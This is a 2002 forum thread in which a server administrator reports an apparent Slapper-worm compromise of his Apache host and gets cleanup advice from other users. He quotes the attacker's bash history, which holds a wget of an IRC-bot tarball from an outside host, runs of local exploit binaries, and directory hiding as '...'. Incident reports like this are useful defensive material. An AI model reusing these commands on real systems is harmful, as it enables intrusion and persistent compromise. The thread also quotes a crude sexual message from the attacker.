Gossamer Forum
Quote Reply
Hacker
Sigh. I've been experiencing some weird things going on on my server and over the past few days have been investigating what is going on. It started when I noticed SSL errors in my error log complaining about wrong connection ids and OpenSSL errors. I eventually found:

http://www.auscert.org.au/render.html?it=2409

...which seemed to be related, so I upgraded OpenSSL to the latest version but the errors persisted.

Then I started noticing strange processes like:

./mech
./a /cgi-bin/moo.cgi

I noticed that updatedb was running but was excluding all the temp directories like /tmp and /var/tmp so I went into those directories and found a load of C files with compiled binaries. Ironically there were readme's with all the files which (luckily) told me exactly what the files were doing....running an IRC bot.

So I deleted all the files and killed the processes. I then checked for hidden files and found a load more including a bash history in /var/tmp which looked like:

Quote:
cd /tmp/.k/xp
export HOME=/tmp
export SHELL=/bin/bash
export TERM=xterm
/bin/bash -i
./sxp2
./epc
export HOME=/tmp
export SHELL=/bin/bash
export TERM=xterm
/bin/bash -i
cd /tmp/.k/xp
./sxp2
cd /tmp
rm -rf .k
export HOME=/tmp
export SHELL=/bin/bash
export TERM=xterm
/bin/bash -i
cd /tmp/.k/xp
./sxp3
wget www.lordofdesire.net/smen/smenemech.tar.gz
tar zxvf smenemech.tar.gz
rm -rf smenemech.tar.gz
cd emech-2.8.4
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
cd ..
ls
mv emech-2.8.4 ...
cd ..
cd /tmp
mv .k k
mv k ...
ls
ls -la
cd /tmp/.k/xp
./sxp2
./ptr
id
./epc
id

Big sigh.

So I deleted everything and changed my root password. I'm at a loss as to how they are getting in. All the hacker files are owned by apache/apache so as a quick, dirty solution I have changed the permissions on the tmp directories so apache can't read/write.

I don't know whether I should completely restore redhat or not.
Quote Reply
Re: [Paul] Hacker In reply to
http://www.lordofdesire.net/

Hmm I wonder if this is the guy. I did find files with SmeNaRuL all over them and that is his IRC nic.

Guess I'll be emailing him.

Sad thing is, he looks quite a bit like me Blush

Last edited by:

Paul: Nov 4, 2002, 5:33 AM
Quote Reply
Re: [Paul] Hacker In reply to
Once your machine has been compromised, I'd do a clean install of the OS. Changing your root password and such won't help. If there's a backdoor on the system, then you really need to do a clean install. It's the only fool proof way of locking the guy out.

- wil
Quote Reply
Re: [Paul] Hacker In reply to
I think this is where I start crying.

http://securityresponse.symantec.com/...ux.slapper.worm.html

If you checkout the ".B" variant it mentions a file called .cinik ......

[root@paul /root]# locate .cinik

Every single directory in /home/httpd has a copy of the .cinik binary in it MadUnsurePirate
Quote Reply
Re: [Paul] Hacker In reply to
Hi Paul

You might find that this helps:

http://www.cert.org/...stem_compromise.html

- wil
Quote Reply
Re: [Paul] Hacker In reply to
I love people like this:

Quote:
Access on your server ? Are you idiot ? Or what ? on IRC ? i dont use IRC! Hmm ...from where do you have this address ? I use only Internet Explorer ! And you can find me on www.camcontacts.net screen name LordOfDeSiRe if you`r wife wants to see me masturbate my little mate !
Quote Reply
Re: [Paul] Hacker In reply to
Any recourse through his FREESERVERS.COM host for violation of TOS?
Quote Reply
Re: [ArmyAirForces] Hacker In reply to
I emailed them two days ago but have had no reply.
Quote Reply
Re: [Paul] Hacker In reply to
Might be worth the cost to call them and express your concerns in person. You've got your log and that file is still resident on his server - would seem to be clear evidence on your behalf.
Quote Reply
Re: [ArmyAirForces] Hacker In reply to
I got a reply. Smile

http://www.lordofdesire.net/

Oops where'd it go Laugh